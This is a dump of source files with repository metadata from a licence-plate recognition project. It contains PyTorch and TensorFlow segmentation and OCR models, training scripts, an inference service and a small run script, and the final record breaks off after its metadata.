"content_id": "3bc0af01d8da082754a2faad95eab4f0132f8960",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1968,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 56,
"path": "/cv/pytorch/pytorch_utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import torch\n\nfrom cv.pytorch.unet import (crop_img)\n\n\ndef save_model(model, path):\n torch.save(model.state_dict(), path)\n\n\ndef load_model(model_class, path, *args, **kwargs):\n model = model_class(*args, **kwargs)\n model.load_state_dict(torch.load(path))\n model.eval()\n\n\ndef standardize(tensor, size, im_channels):\n if type(tensor) != torch.Tensor:\n t_shape = tensor.shape\n new_shape = (t_shape[0], t_shape[3], t_shape[1], t_shape[2])\n tensor = torch.tensor(tensor)\n tensor = torch.reshape(tensor, new_shape)\n return tensor\n\n\ndef train_model(x_train, y_train, x_val, y_val, model_definition,\n params, logger):\n size = params['dsize']\n im_channels = params['im_channels']\n model_params = params['model_params']\n x_train = standardize(x_train, size, im_channels)\n y_train = standardize(y_train, size, im_channels)\n x_val = standardize(x_val, size, im_channels)\n y_val = standardize(y_val, size, im_channels)\n model = model_definition(**model_params)\n epochs = 10\n delta = 1 + (epochs // 10)\n criterion = torch.nn.MSELoss(reduction='mean')\n optimizer = torch.optim.SGD(model.parameters(), lr=1e-3)\n logger.info(f\"Iterating through epochs\")\n shape1 = x_train.shape[1:4]\n shape2 = y_train.shape[1:4]\n for t in range(epochs):\n for idx in range(len(x_train)):\n x = torch.reshape(x_train[idx, :, :, :], (1, *shape1))\n y = torch.reshape(y_train[idx, :, :, :], (1, *shape2))\n y_pred = model(x)\n loss = criterion(y_pred, crop_img(y, y_pred))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n logger.info(f\"Epoch, image: [{t}, {idx}]\")\n if t % delta == (delta - 1):\n logger.info(f\"Loss [{t}]: {loss.item()}\")\n save_model(model, params['model_file'])\n load_model(model_definition, params['model_file'], **model_params)\n return model\n"
},
{
"alpha_fraction": 0.5301143527030945,
"alphanum_fraction": 0.5789072513580322,
"avg_line_length": 35.775699615478516,
"blob_id": "3d480accaca05379d0c74c70ddc37b7d3a43fcc4",
"content_id": "0d7f4dada0d70d4c3733954087d2ff88e037baa4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3935,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 107,
"path": "/cv/tensorflow_models/unet2text2.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Lambda, Input,\n MaxPooling2D)\n\n\ndef identity_function(x):\n return x\n\n\ndef normalize_image_shape(height, width):\n base = (2 ** 4)\n width = (width // base) * base + base * int(width > 0)\n height = (height // base) * base + base * int(height > 0)\n return height, width\n\n\ndef compose_fs(functions):\n def composed_function(x):\n for f in functions:\n x = f(x)\n return x\n\n return composed_function\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n inputs = Input((img_height, img_width, in_channels))\n x = Lambda(lambda aux: aux / 255)(inputs)\n # Downward\n kwargs_conv2d = {\n 'activation': 'relu',\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n k_size = (3,) * 2\n h_dim = 10\n h1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n h1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h1)\n h2 = MaxPooling2D((2, 2))(h1)\n h2 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h2)\n h2 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h2)\n h3 = MaxPooling2D((2, 2))(h2)\n h3 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h3)\n h3 = Conv2D(h_dim * 2, kernel_size=k_size, **kwargs_conv2d)(h3)\n fg = compose_fs([\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(out_channels * 2),\n tf.keras.layers.Dense(out_channels),\n tf.keras.layers.Softmax(axis=1),\n tf.keras.layers.Reshape((-1, 1, 1, 37)),\n ])\n outputs = []\n for it in range(13):\n # First glimpse\n a1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n a1 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a1)\n a1 = Conv2D(2, kernel_size=k_size, **kwargs_conv2d)(a1)\n a1 = tf.keras.layers.Softmax(axis=-1)(a1)\n a1 = a1[:, :, :, 0:1]\n a1 = tf.tile(a1, multiples=[1, 1, 1, h1.shape[-1]])\n g1 = tf.concat([h1, a1 * h1], axis=-1)\n # Second glimpse\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(g1)\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = MaxPooling2D((2, 2))(a2)\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = Conv2D(2, kernel_size=k_size, **kwargs_conv2d)(a2)\n a2 = tf.keras.layers.Softmax(axis=-1)(a2)\n a2 = a2[:, :, :, 0:1]\n a2 = tf.tile(a2, multiples=[1, 1, 1, h2.shape[-1]])\n g2 = tf.concat([h2, a2 * h2], axis=-1)\n # Third glimpse\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(g2)\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = MaxPooling2D((2, 2))(a3)\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = Conv2D(2, kernel_size=k_size, **kwargs_conv2d)(a3)\n a3 = tf.keras.layers.Softmax(axis=-1)(a3)\n a3 = a3[:, :, :, 0:1]\n a3 = tf.tile(a3, multiples=[1, 1, 1, h3.shape[-1]])\n g3 = tf.concat([h3, a3 * h3], axis=-1)\n # Flattening\n g = fg(g3)\n outputs.append(g)\n outputs = tf.concat(outputs, axis=3)\n outputs = tf.keras.layers.Reshape((-1, 13, 37))(outputs)\n print(outputs.shape)\n # Model compilation\n model = Model(inputs=[inputs], outputs=[outputs])\n model.compile(\n optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']\n )\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.5710601806640625,
"alphanum_fraction": 0.5957019925117493,
"avg_line_length": 31.616823196411133,
"blob_id": "9b3a9d101389faf751c2120d7c5bf0977f307f39",
"content_id": "91b52902c439133cd6b159bb3d70aa3670c7d128",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3490,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 107,
"path": "/cv/tensorflow_models/unet2text3.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.layers import (\n Conv2D, Lambda, Input,\n MaxPooling2D)\nimport numpy as np\n\n\ndef identity_function(x):\n return x\n\n\ndef normalize_image_shape(height, width):\n base = (2 ** 4)\n width = (width // base) * base + base * int(width > 0)\n height = (height // base) * base + base * int(height > 0)\n return height, width\n\n\ndef compose_fs(functions):\n def composed_function(x):\n for f in functions:\n x = f(x)\n return x\n\n return composed_function\n\n\ndef get_model_definition(img_height, img_width, in_channels, out_channels):\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n input_image = Input((img_height, img_width, in_channels))\n x = Lambda(lambda aux: aux / 255)(input_image)\n # Downward\n kwargs_conv2d = {\n 'activation': 'relu',\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n timesteps = 13\n abecedary_len = 37\n k_size = (3,) * 2\n h_dim = 50\n\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(x)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = MaxPooling2D((2, 2))(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = MaxPooling2D((2, 2))(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = MaxPooling2D((2, 2))(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n h = Conv2D(h_dim, kernel_size=k_size, **kwargs_conv2d)(h)\n\n def position_f(pos):\n pos = np.identity(abecedary_len)[pos]\n pos = np.reshape(pos, (-1, abecedary_len))\n pos = tf.constant(pos, dtype='float32')\n return pos\n\n x2_f = compose_fs((\n Conv2D(2, kernel_size=k_size, **kwargs_conv2d),\n tf.keras.layers.Flatten(),\n ))\n attention_f = compose_fs((\n tf.keras.layers.Dense(h.shape[1] * h.shape[2] * 2),\n tf.keras.layers.Dense(h.shape[1] * h.shape[2] * 2),\n tf.keras.layers.Dense(h.shape[1] * h.shape[2] * 2),\n tf.keras.layers.Reshape((h.shape[1], h.shape[2], 2)),\n tf.keras.layers.Softmax(axis=-1),\n lambda aux: aux[:, :, :, 0:1],\n lambda aux: tf.tile(aux, multiples=[1, 1, 1, h.shape[-1]])\n ))\n glimpse_f = compose_fs((\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(out_channels),\n tf.keras.layers.Softmax(axis=1),\n tf.keras.layers.Reshape((-1, 1, 1, abecedary_len)),\n ))\n outputs = []\n for it in range(timesteps):\n position = position_f(it)\n x2 = x2_f(h)\n x2 = tf.concat([x2, position], axis=-1)\n attention = attention_f(x2)\n glimpse = tf.concat([h, attention * h], axis=-1)\n glimpse = glimpse_f(glimpse)\n outputs.append(glimpse)\n outputs = tf.concat(outputs, axis=3)\n outputs = tf.keras.layers.Reshape((-1, timesteps, abecedary_len))(outputs)\n print(outputs.shape)\n # Model compilation\n model = Model(inputs=[input_image], outputs=[outputs])\n model.compile(\n optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']\n )\n pre_process_input = identity_function\n return model, pre_process_input\n"
},
{
"alpha_fraction": 0.8035714030265808,
"alphanum_fraction": 0.8035714030265808,
"avg_line_length": 55,
"blob_id": "390d80078e5421f13d1f6c78a4f3f928147c8714",
"content_id": "62026b6871106a59717ee066165820c27c515c71",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 168,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 3,
"path": "/call_service.sh",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "export PYTHONPATH=/home/sebastian/projects/pedro\necho PYTHONPATH: $PYTHONPATH | rm data/plates/alpr/*.png\nconda run -n seg_models_cpu python services/alpr/inference.py\n"
},
{
"alpha_fraction": 0.5994654893875122,
"alphanum_fraction": 0.6158342957496643,
"avg_line_length": 35.50609588623047,
"blob_id": "e63781c4dc6449dab62e4fd2f67dc0eb88135375",
"content_id": "db04e91dc910aed98685c68e1e0409eddb094c93",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5987,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 164,
"path": "/services/plate_segmentation/inference.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import glob\nimport cv2\nimport pandas as pd\n\nfrom cv.image_processing import (\n get_contours_rgb,\n get_warping,\n warp_image,\n pred2im,\n save_image,\n get_rectangle,\n)\nfrom cv.tensorflow_models.unet_little import get_model_definition as plate_seg_model_def\nfrom io_utils.data_source import (\n get_image,\n)\nfrom io_utils.utils import (\n CustomLogger\n)\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/input/'\n output_folder = f'{path}/plates/plate_segmentation'\n # dsize = (576, 576)\n dsize = (256, 256)\n big_shape = (1024, 1024)\n plate_shape = (200, 50)\n color = (255, 0, 0)\n thickness = 3\n debug_level = 1#5\n min_pct = 0.04\n max_pct = 0.20\n min_area = (big_shape[0] * min_pct) * (big_shape[1] * min_pct)\n max_area = (big_shape[0] * max_pct) * (big_shape[1] * max_pct)\n train_files = glob.glob(f\"{input_folder}/train/*.jpg\")\n test_files = glob.glob(f\"{input_folder}/test/*.jpg\")\n files = train_files + test_files\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'files': files,\n 'plate_shape': plate_shape,\n 'color': color,\n 'thickness': thickness,\n 'debug_level': debug_level,\n 'dsize': dsize,\n 'plate_segmentation_model_file': f'{output_folder}/model/best_model.h5',\n 'labels': f\"{input_folder}/labels_plate_text.json\",\n 'metadata': f\"{input_folder}/files.csv\",\n 'big_shape': big_shape,\n 'min_area': min_area,\n 'max_area': max_area,\n 'plate_segmentation_model_params': {\n 'img_height': 256,\n 'img_width': 256,\n 'in_channels': 3,\n 'out_channels': 2,\n },\n }\n return params\n\n\ndef draw_rectangle(im, r):\n if (r is not None) and (len(r) > 0):\n x, y, w, h = r\n im = cv2.rectangle(im, (x, y), (x + w, y + h), (0, 255, 0), 2)\n return im\n\n\ndef plate_segmentation(event, context):\n logger = context['logger']\n file = event['image_file']\n dsize = context['dsize']\n model = context['plate_segmentation_model']\n in_channels = context['plate_segmentation_model_params']['in_channels']\n preprocess_input = context['plate_segmentation_preprocessing']\n out_folder = context['output_folder']\n big_shape = context['big_shape']\n min_area = context['min_area']\n max_area = context['max_area']\n debug_level = context['debug_level']\n color = context['color']\n thickness = context['thickness']\n plate_shape = context['plate_shape']\n file_debug_name = file.split('/')[-1]\n file_debug_name = file_debug_name.split('.')[0]\n logger = CustomLogger(file_debug_name, logger)\n x = get_image(file, dsize, in_channels)\n x = pred2im(x, dsize, 0, in_channels)\n logger.info(\"Pre process input\")\n # if debug_level > 0:\n # x_debug = cv2.resize(x, dsize=big_shape, interpolation=cv2.INTER_CUBIC)\n # save_image(x_debug, f\"{out_folder}/rectangle_{file_debug_name}_x.png\")\n x = preprocess_input(x)\n logger.info(\"Inference\")\n x = x.reshape(1, dsize[0], dsize[0], 3)\n y = (model.predict(x) * 255).round()\n y = pred2im(y, dsize, 0, 3)\n image = get_image(file, big_shape, in_channels)\n image = pred2im(image, big_shape, 0, in_channels)\n image = image.reshape(big_shape[0], big_shape[0], 3)\n y = cv2.resize(y, dsize=big_shape, interpolation=cv2.INTER_CUBIC)\n logger.info(\"Getting contours\")\n contours = get_contours_rgb(y, min_area, max_area)\n # if debug_level > 0:\n # save_image(255-y, f\"{out_folder}/rectangle_{file_debug_name}_y.png\")\n im_pred = None\n rectangle = None\n image_debug = None\n if len(contours) > 0:\n rectangle = get_rectangle(contours)\n image_debug = cv2.drawContours(image.copy(), [rectangle], 0, color, thickness)\n if debug_level > 0:\n logger.info(f\"Saving rectangle\")\n # save_image(image_debug, f\"{out_folder}/rectangle_{file_debug_name}.png\")\n # image_debug = cv2.drawContours(image.copy(), [box], 0, color, thickness)\n # logger.info(f\"Saving min_area_boxes\")\n # save_image(image_debug, f\"{out_folder}/min_area_box_{file_debug_name}.png\")\n logger.info(\"Warp images\")\n warping = get_warping(rectangle, plate_shape)\n im_pred = warp_image(image, warping, plate_shape)\n logger.info(f\"Saving min_area_boxes\")\n # if debug_level > 0:\n # save_image(im_pred, f\"{out_folder}/plate_{file_debug_name}.png\")\n else:\n logger.info(\"Countours not found\")\n result = {\n 'file': file,\n 'rectangle': rectangle,\n 'len_contours': len(contours),\n 'image': im_pred,\n 'image_debug': image_debug,\n }\n logger.info(f\"contours [{file.split('/')[-1]}]: {len(contours)}\")\n return result\n\n\ndef segment_plates(params):\n from loguru import logger\n\n model_file = params['plate_segmentation_model_file']\n logger.info(\"Loading model\")\n plate_segmentation_model_params = params['plate_segmentation_model_params']\n plate_segmentation_model_file, plate_segmentation_preprocessing = plate_seg_model_def(**plate_segmentation_model_params)\n plate_segmentation_model_file.load_weights(model_file)\n logger.info(\"Loading data\")\n files = params['files']\n context = {\n 'logger': logger,\n 'plate_segmentation_model': plate_segmentation_model_file,\n 'plate_segmentation_preprocessing': plate_segmentation_preprocessing,\n }\n context.update(params)\n events = [{'image_file': f, 'ejec_id': ejec_id} for ejec_id, f in enumerate(files)]\n results = map(lambda e: plate_segmentation(event=e, context=context), events)\n results = map(lambda e: {k: e[k] for k in ('file', 'len_contours')}, results)\n results = pd.DataFrame(results)\n results.to_csv(f\"{params['output_folder']}/events_results.csv\")\n\n\nif __name__ == \"__main__\":\n segment_plates(get_params())\n"
},
{
"alpha_fraction": 0.5967479944229126,
"alphanum_fraction": 0.6032520532608032,
"avg_line_length": 33.16666793823242,
"blob_id": "304abcfeac0a8cd07dd0fa7e89480d4d0b499541",
"content_id": "f862360d81d5eb588b3c54da15454ca06ad210e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 615,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 18,
"path": "/io_utils/data_output.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom PIL import Image\nimport os\n\n\ndef save_inference_images(y_pred, metadata, folder):\n output_folder = f\"{folder}/output\"\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n for id_im, im_file in zip(metadata.idx, metadata.image):\n y_im = y_pred[id_im,:,:,0]\n new_shape = (y_im.shape[0], y_im.shape[1])\n y_im = np.reshape(y_im, new_shape)\n y_im = Image.fromarray(y_im)\n y_im = y_im.convert(\"L\")\n im_filename = im_file.split('.')[0]\n filename = f\"{output_folder}/{im_filename}_pred.jpg\"\n y_im.save(filename)\n"
},
{
"alpha_fraction": 0.47587352991104126,
"alphanum_fraction": 0.5008319616317749,
"avg_line_length": 26.953489303588867,
"blob_id": "0fab8b9edefe0292617d2243faaf7ee085796ced",
"content_id": "4963837aa2ffa513c2828829acaece049eaeab52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1202,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 43,
"path": "/io_utils/read_polygons_json.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: sebastian\n\"\"\"\nimport json\nimport pandas as pd\n\n\ndef __get_image_polygons(row):\n regions = row['regions']\n vals = []\n for region in regions.values():\n label = region['region_attributes']['label']\n x = region['shape_attributes']['all_points_x'][0:-1]\n y = region['shape_attributes']['all_points_y'][0:-1]\n new_val = {\n 'filename': row['filename'],\n 'label': label,\n 'x0': x[0],\n 'y0': y[0],\n 'x1': x[1],\n 'y1': y[1],\n 'x2': x[2],\n 'y2': y[2],\n 'x3': x[3],\n 'y3': y[3],\n }\n new_val = pd.DataFrame.from_dict(new_val, orient='index')\n new_val = new_val.T\n vals.append(new_val)\n vals = pd.concat(vals, axis=0)\n return vals\n\n\ndef get_labels_plates_text(file):\n with open(file) as json_file:\n data = json.load(json_file)\n data = list(data.values())\n data = [__get_image_polygons(row) for row in data]\n data = pd.concat(data, axis=0).reset_index(drop=True)\n int_cols = ['x0', 'y0', 'x1', 'y1', 'x2', 'y2', 'x3', 'y3']\n for c in int_cols:\n data[c] = data[c].astype(int)\n return data\n"
},
{
"alpha_fraction": 0.6504713296890259,
"alphanum_fraction": 0.6584481596946716,
"avg_line_length": 31.83333396911621,
"blob_id": "188692d011b8d51f59f8938e1db4a26417f79e95",
"content_id": "ba28920d49124c3a01b0cf142bd399df938e71e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1379,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 42,
"path": "/services/plate_segmentation/training_segmodels.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "import pathlib\n\nfrom loguru import logger\n\nfrom cv.tensorflow_models.tensorflow_utils import train_model\nfrom io_utils.data_source import get_image_label, get_plates_bounding_metadata\nfrom cv.seg_models.model_definition import get_model_definition\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data/'\n folder = f'{path}/plates'\n dsize = (768, 768)\n params = {\n 'folder': folder,\n 'epochs': 1000,\n 'dsize': dsize,\n 'model_folder': f'{folder}/model',\n 'model_file': f'{folder}/model/best_model.h5',\n 'labels': f\"{folder}/labels_plates.csv\",\n 'metadata': f\"{folder}/files.csv\",\n 'model_params': {}\n }\n return params\n\n\ndef train_plate_segmentation(params):\n dsize = params['dsize']\n folder = params['folder']\n metadata = get_plates_bounding_metadata(params)\n train_metadata = metadata.query(\"set == 'train'\")\n test_metadata = metadata.query(\"set == 'test'\")\n train_metadata = set_index(train_metadata)\n test_metadata = set_index(test_metadata)\n x_train, y_train = get_image_label(folder, train_metadata, dsize)\n x_val, y_val = get_image_label(folder, test_metadata, dsize)\n train_model(x_train, y_train, x_val, y_val, get_model_definition, params, logger)\n\n\nif __name__ == \"__main__\":\n train_plate_segmentation(get_params())\n"
},
{
"alpha_fraction": 0.5215553641319275,
"alphanum_fraction": 0.5452240109443665,
"avg_line_length": 30.972972869873047,
"blob_id": "aeb0465bd5e4db85c8d5c4db794bfd7f39631476",
"content_id": "dabb88c64c476f6808070dc22050a712d55b8e50",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1183,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 37,
"path": "/cv/tensorflow_models/cnn_encoder.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\n\nimport tensorflow as tf\n\n\nclass CNN_Encoder(tf.keras.Model):\n\n def __init__(self, embedding_dim, img_height, img_width):\n super(CNN_Encoder, self).__init__()\n base = (2 ** 4)\n msg = \"{actual} not multiple of \" + str(base)\n assert img_height % base == 0, msg.format(actual=img_height)\n assert img_width % base == 0, msg.format(actual=img_width)\n self.l_preprocessing = tf.keras.layers.Lambda(lambda aux: aux / 255)\n kwargs_conv2d = {\n 'filters': 10,\n 'kernel_size': (3,) * 2,\n 'activation': tf.keras.layers.LeakyReLU(alpha=0.1),\n 'kernel_initializer': 'he_normal',\n 'padding': 'same',\n }\n self.l_1 = tf.keras.layers.Conv2D(**kwargs_conv2d)\n self.l_2 = tf.keras.layers.Conv2D(**kwargs_conv2d)\n # shape after fc == (batch_size, 64, embedding_dim)\n self.fc_1 = tf.keras.layers.Dense(embedding_dim)\n self.fc_2 = tf.nn.relu\n\n def call(self, x):\n x = self.l_preprocessing(x)\n x = self.l_1(x)\n x = self.l_2(x)\n x = self.fc_1(x)\n x = self.fc_2(x)\n return x\n"
},
{
"alpha_fraction": 0.5111662745475769,
"alphanum_fraction": 0.5620347261428833,
"avg_line_length": 24.1875,
"blob_id": "3bae21da5e518ce9592a2d299c10a04d9959a596",
"content_id": "7e9059fb26fc3d320b0c82100dc4cf2171e5824b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "permissive",
"max_line_length": 69,
"num_lines": 32,
"path": "/cv/pytorch/tests/test_pytorch_utils.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@author: Sebastian Cepeda\n@email: [email protected]\n\"\"\"\nimport torch\n\nfrom cv.pytorch.pytorch_utils import train_model\nfrom cv.pytorch.unet import (UNet)\n\n\ndef train_model():\n from loguru import logger\n\n logger.info(f\"Start\")\n params = {\n 'path': './test.model',\n 'dsize': (572, 572),\n 'im_channels': 1,\n }\n x_train = torch.rand((1, 1, 572, 572))\n y_train = torch.rand((1, 2, 388, 388))\n x_val = torch.rand((1, 1, 572, 572))\n y_val = torch.rand((1, 2, 388, 388))\n logger.info(f\"Call to train_model\")\n model_params = {\n 'in_channels': 1,\n 'out_channels': 2,\n }\n trained_model = train_model(x_train, y_train, x_val, y_val, UNet,\n model_params, params, logger)\n assert trained_model is not None\n print(trained_model)\n"
},
{
"alpha_fraction": 0.6376953125,
"alphanum_fraction": 0.64501953125,
"avg_line_length": 36.23636245727539,
"blob_id": "46dd67dc6e3ddd63338d045cb4f38896b02be3be",
"content_id": "f42f92aa8195a4d181944bd157e0076f61181f44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4096,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 110,
"path": "/services/plate_ocr/training.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
"text": "from loguru import logger\n\nfrom cv.tensorflow_models.tensorflow_utils import train_model_gen\nfrom cv.tensorflow_models.unet2text3 import (\n get_model_definition,\n normalize_image_shape\n)\nfrom io_utils.data_source import (\n get_plates_text_metadata,\n get_image_text_label,\n get_image_text_label_sim\n)\nfrom io_utils.image_text_label_generator import ImageTextLabelGenerator\nfrom io_utils.utils import set_index\n\n\ndef get_params():\n path = '/home/sebastian/projects/pedro/data'\n input_folder = f'{path}/plates/plate_segmentation'\n output_folder = f'{path}/plates/plate_ocr'\n width = 200\n height = 50\n height, width = normalize_image_shape(height, width)\n # height = height + 1\n # width = width + 1\n dsize = (height, width)\n alphabet = ' abcdefghijklmnopqrstuvwxyz0123456789'\n alphabet = {char: idx for char, idx in zip(alphabet, range(len(alphabet)))}\n in_channels = 1\n out_channels = len(alphabet)\n params = {\n 'input_folder': input_folder,\n 'output_folder': output_folder,\n 'epochs': 1 * 1000,\n 'dsize': dsize,\n 'model_folder': f'{output_folder}/model',\n 'model_file': f'{output_folder}/model/best_model.h5',\n 'metadata': f\"{path}/plates/input/labels/ocr/files.csv\",\n 'alphabet': alphabet,\n 'model_params': {\n 'img_height': dsize[0],\n 'img_width': dsize[1],\n 'in_channels': in_channels,\n 'out_channels': out_channels,\n },\n }\n return params\n\n\ndef train_ocr_model(params):\n dsize = params['dsize']\n model_params = params['model_params']\n in_folder = params['input_folder']\n alphabet = params['alphabet']\n #\n in_channels = model_params['in_channels']\n out_channels = model_params['out_channels']\n metadata = get_plates_text_metadata(params)\n metadata.file_name = 'plate_' + metadata.file_name\n metadata.file_name = metadata.file_name.str.split('.').str[0] + '.png'\n train_meta = metadata.query(\"set == 'train'\")\n test_meta = metadata.query(\"set == 'test'\")\n train_meta = set_index(train_meta)\n test_meta = set_index(test_meta)\n model, preprocess_input = get_model_definition(**model_params)\n f_train_params = {\n 'folder': in_folder, 'metadata': train_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n f_test_params = {\n 'folder': in_folder, 'metadata': test_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n data_train = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_train_params)\n data_val = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_test_params)\n train_model_gen(data_train, data_val, model, params, logger)\n\n\ndef train_ocr_model_sim(params):\n dsize = params['dsize']\n model_params = params['model_params']\n in_folder = params['input_folder']\n alphabet = params['alphabet']\n #\n in_channels = model_params['in_channels']\n out_channels = model_params['out_channels']\n metadata = get_plates_text_metadata(params)\n metadata.image = 'plates_' + metadata.image\n metadata.image = metadata.image.str.split('.').str[0] + '.png'\n test_meta = metadata.query(\"set == 'test'\")\n test_meta = set_index(test_meta)\n model, preprocess_input = get_model_definition(**model_params)\n f_train_params = {\n 'dsize': dsize, 'in_channels': in_channels,\n 'out_channels': out_channels, 'alphabet': alphabet\n }\n f_test_params = {\n 'folder': in_folder, 'metadata': test_meta, 'dsize': dsize,\n 'in_channels': in_channels, 'out_channels': out_channels,\n 'alphabet': alphabet\n }\n data_train = ImageTextLabelGenerator(get_image_text_label_sim, preprocess_input, f_train_params)\n data_val = ImageTextLabelGenerator(get_image_text_label, preprocess_input, f_test_params)\n train_model_gen(data_train, data_val, model, params, logger)\n\n\nif __name__ == \"__main__\":\n train_ocr_model(get_params())\n"
},
{
"alpha_fraction": 0.5260456800460815,
"alphanum_fraction": 0.5855786800384521,
"avg_line_length": 35.42055892944336,
"blob_id": "cbc3057f3375e2a2d7359892d956364944bedadb",
"content_id": "9d9a25e47a2aae8553a40b42d5e2d64476965723",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3897,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 107,
"path": "/cv/tensorflow_models/unet2text.py",
"repo_name": "sebastiancepeda/pedro",
"src_encoding": "UTF-8",
